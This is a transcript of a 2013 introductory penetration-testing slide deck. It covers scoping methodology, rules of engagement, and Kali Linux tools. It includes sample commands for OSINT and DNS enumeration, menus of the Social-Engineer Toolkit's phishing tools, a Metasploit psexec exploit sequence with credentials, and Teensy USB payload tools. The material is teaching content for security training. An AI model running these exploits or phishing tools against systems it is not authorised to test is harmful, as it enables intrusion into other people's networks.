Introduction to Penetration...

© 2013 Wilkinson Technology Services

Wilkinson Technology

Introduction to Penetration Testing

Paul D. [email protected]

@compuwar

mailto:[email protected]


Speaker Bio

Paul D. Robertson

Chief Technology Officer and Chief Information Security OfficerWilkinson Technology Serviceswww.wilkitech.com


Penetration Testing- Definition

NIST SP-800-115 - Technical Guide to Information Security Testing and Assessment

Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.


Caveats

Know the legality of what you’re doing before you do it.Get Permission.Just being able to run canned tools isn’t usually enough.Worry about 3rd parties.Always test your tools in a controlled environment.Insurance is a good thing.Evolve.


OSSTMM

Open Source Security Testing Methodology Manual

One of many methodologies- none of them canonicalGood place to find all the “boring stuff” and “confusing terms.”


Defining A Security Test

1. Define what you want to protect. These are the assets. The protection mechanisms for these assets are the Controls you will test to identify Limitations.2. Identify the area around the assets which includes the protection mechanisms and the processes or services built around the assets. This is where interaction with assets will take place. This is your engagement zone.


Defining A Security Test

3. Define everything outside the engagement zone that you need to keep your assets operational. This may include things you may not be able to directly influence like electricity, food, water, air, stable ground, information, legislation, regulations and things you may be able to work with like dryness, warmth, coolness, clarity, contractors, colleagues, branding, partnerships, and so on. Also count that which keeps the infrastructure operational like processes, protocols, and continued resources. This is your test scope.


Defining A Security Test (Cont.)

4. Define how your scope interacts within itself and with the outside. Logically compartmentalize the assets within the scope through the direction of interactions such as inside to outside, outside to inside, inside to inside, department A to department B, etc. These are your vectors. Each vector should ideally be a separate test to keep each compartmentalized test duration short before too much change can occur within the environment.



5. Identify what equipment will be needed for each test. Inside each vector, interactions may occur on various levels. These levels may be classified in many ways, however here they have been classified by function as five channels. The channels are Human, Physical, Wireless, Telecommunications, and Data Networks. Each channel must be separately tested for each vector.



6. Determine what information you want to learn from the test. Will you be testing interactions with the assets or also the response from active security measures? The test type must be individually defined for each test, however there are six common types identified here as Blind, Double Blind, Gray Box, Double Gray Box, Tandem, and Reversal.



7. Assure the security test you have defined is in compliance to the Rules of Engagement, a guideline to assure the process for a proper security test without creating misunderstandings, misconceptions, or false expectations.


Scope

The scope is the total possible operating security environment for any interaction with any asset which may include the physical components of security measures as well. The scope is comprised of three classes of which there are five channels: Telecommunications and Data Networks security Channels of the COMSEC class, Physical and Human Security Channels of the PHYSSEC class, and the full spectrum Wireless Security Channel of the SPECSEC class.


Scope

Classes are used to define an area of study, investigation, or operation. However, Channels are the specific means of interacting with assets. An asset can be anything that has value to the owner. Assets can be physical property like gold, people, blueprints, laptops, the typical 900 MHz frequency phone signal, and money; or intellectual property such as personnel data, a relationship, a brand, business processes, passwords, and something which is said over the 900 MHz phone signal.


Scope (Cont.)

It must be made clear that a security analysis must be restricted to that which is within a type of certainty (not to be confused with risk which is not a certainty but a probability). These restrictions include:1.Non-events such as a volcano eruption where no volcano exists2.Non-impact like moonlight through data center window3. Global-impacting such as a catastrophic meteor impact.

While a thorough security audit requires testing all five channels, realistically, tests are conducted and categorized by the required expertise of the Analyst and the required equipment for the audit.


Scope (Cont.)

Classes:

Physical Security (PHYSSEC)Spectrum Security (SPECSEC)Communications Security (COMSEC)


Scope (Cont.)

Physical Security Channels

Human: Comprises the human element of communication where interaction is either physical or psychological.

Physical: Physical security testing where the channel is both physical and non-electronic in nature. Comprises the tangible element of security where interaction requires physical effort or an energy transmitter to manipulate.


Scope (Cont.)

Spectrum Security Channel

Wireless: Comprises all electronic communications, signals, and emanations which take place over the known EM spectrum. This includes ELSEC as electronic communications, SIGSEC as signals, and EMSEC which are emanations untethered by cables.


Common Test Types

Blind: No prior target knowledge.Double Blind: No prior target knowledge and no target notification.Gray Box: Limited target knowledgeDouble Gray Box: Limited target knowledge, target knows timeframe of test.Tandem: Full information on both sides.Reversal: Full information for attacker, no information for defenders.


Rules of Engagement

What’s in scope?What’s allowed?NDAs, contracts, get out of jail free cards…Required reporting elements.Reporting channels


Testing

Passive information collectionActive information collectionActively test assets


Tools

ToolboxTest Environment


Test Environment

MSDN/TechnetVirtual/PhysicalTest Software Revisions!Keep old versions!


Toolbox

Kali Linux is the main tool we’ll be discussing

Replacement for Backtrack LinuxDesigned for PentestingDebian-based


Kali Linux

Lives at http://www.kali.org

Actual repository at http.kali.org


Kali Linux

Check your checksum after downloading!Linux: sha1sum OSX: shasumValidate SHA1 file with GPG- it’s in the docs- next slide…

Can run “live” from DVD or USB or install in VM or on hardwareCan add persistence to USB installsDual boot isn’t always trivial, neither is EFI bootIf you run in a VM, you need a USB-based wireless adapter to attackwireless networks. Kernels are already patched for wireless injectionARM versions available


Kali Linux

RTFM!http://docs.kali.orghttp://docs.kali.org/pdf/kali-book-en.pdfhttp://forums.kali.orgIrc.freenode.net #kali-linux


Kali Linux

Caveats:

Not really designed for complete newbiesUpdates routinely break things- snapshot VMsUse pass-through, not NAT for VMsThere are more than 300 tools in the distribution- You won’t always find information for them allYou will be running as root all the time.


Kali Linux

Relatively easy to build your own custom versionUnlike Backtrack, everything is filesystem standard- no more of that/pentest stuff!Command help sometimes off a bit- just use the command directly, It’s in the path.


Kali Linux

Relatively easy to build your own custom version from within.Unlike Backtrack, everything is filesystem standard- no more of that/pentest stuff!Command help sometimes off a bit- just use the command directly, It’s in the path.


Kali Linux

Good Targets:

https://www.pentesterlab.com/

http://vulnhub.com/


theharvester

Applications->Kali Linux->Information Gathering->OSINT Analysis

Example is wrong- no need for ./ or .py

theharvester –d targetdomain –b google –l 500Theharvester –d targetdomain –b linkedin

Using –b all will sometimes give strange results

Can redirect to a file


theharvester

theharvester –d mydomain.foo –b all

[+] Emails found:[email protected]@[email protected]@mydomain.foop…@[email protected]


theharvester

theharvester –d mydomain.foo –b all

[+] Hosts found in search engines:---------------------------------------------127.0.0.110:www. mydomain.foo127.0.0.110:dns1. mydomain.foo127.0.0.22:dns2. mydomain.foo127.10.0.110:www. mydomain.foo[+] Virtual hosts----------------------127.0.0.110 otherdomain.bar127.0.0.110 yetanother.baz127.0.0.110 otherdomain.baz127.0.0.110 www.mydomain.foo


theharvester

I have found that therarvester finds things in Google that the metasploit auxillary/gather/search_email_collector


DNS

dnsrecon –d mydomaindnsenum mydomain

All allow usage of a wordlist to enumerate potential hostnames.Wordlists live in /usr/share/wordlistrockyou is gzipped

Can also use metasploit


DNS

In metasploituse auxiliary/gather/enum_dns set DOMAIN=mydomainset ENUM_BRT trueset WORDLIST /opt/metasploit/apps/pro/msf3/data/wordlists/namelist.txt set ENUM_AXFR false


OpenVAS

Good (not great) vulnerability scannerForked from Nessus before everything went commercialRun the setup first to set up the admin password and start the enginesGSD is difficult to navigate- use GSA if you canUse domain credentials if you can and filter for high and medium vulnsUse openvas-nvt-sync before starting up each time


SET

se-toolkit

1)Social-Engineering Attacks2)Fast-Track Penetration Testing3)Third Party Modules4)Update the Metasploit Framework5)Update the Social-Engineer Toolkit6)Update SET configuration7)Help, Credits, and About

99) Exit the Social-Engineer Toolkit


SET

se-toolkit

1)Spear-Phishing Attack Vectors2)Website Attack Vectors3)Infectious Media Generator4)Create a Payload and Listener5)Mass Mailer Attack6)Arduino-Based Attack Vector7)SMS Spoofing Attack Vector8)Wireless Access Point Attack Vector9)QRCode Generator Attack Vector10)Powershell Attack Vectors11)Third Party Modules


Fern Wi-Fi Cracker

GUI toolWPA, WPA2 and WEPWordlists supported


Metasploit

service postgresql startservice metasploit startmsfconsole


Metasploit

use exploit/windows/smb/psexecset LHOST 10.0.0.1set RHOST 10.0.0.127set SMBUser victimset SMBPass passwordexploit


Metasploit

service postgresql startservice metasploit startmsfconsole


Teensy 3.0


Teensy 3.0

$20.00Can act as a USB HIDAdd teensydurino code to arduino to load sketchesCommonly plays as an Apple USB keyboard, which is welcomedby Win*, OSX and most GUI Linuxes


Kautilya

http://code.google.com/kautilya

Contains many Teensy payloads


Demo Time

Assuming everything works…


Wilkinson Technology

[email protected]

Introduction to Penetration...

Documents

Transcript of Introduction to Penetration...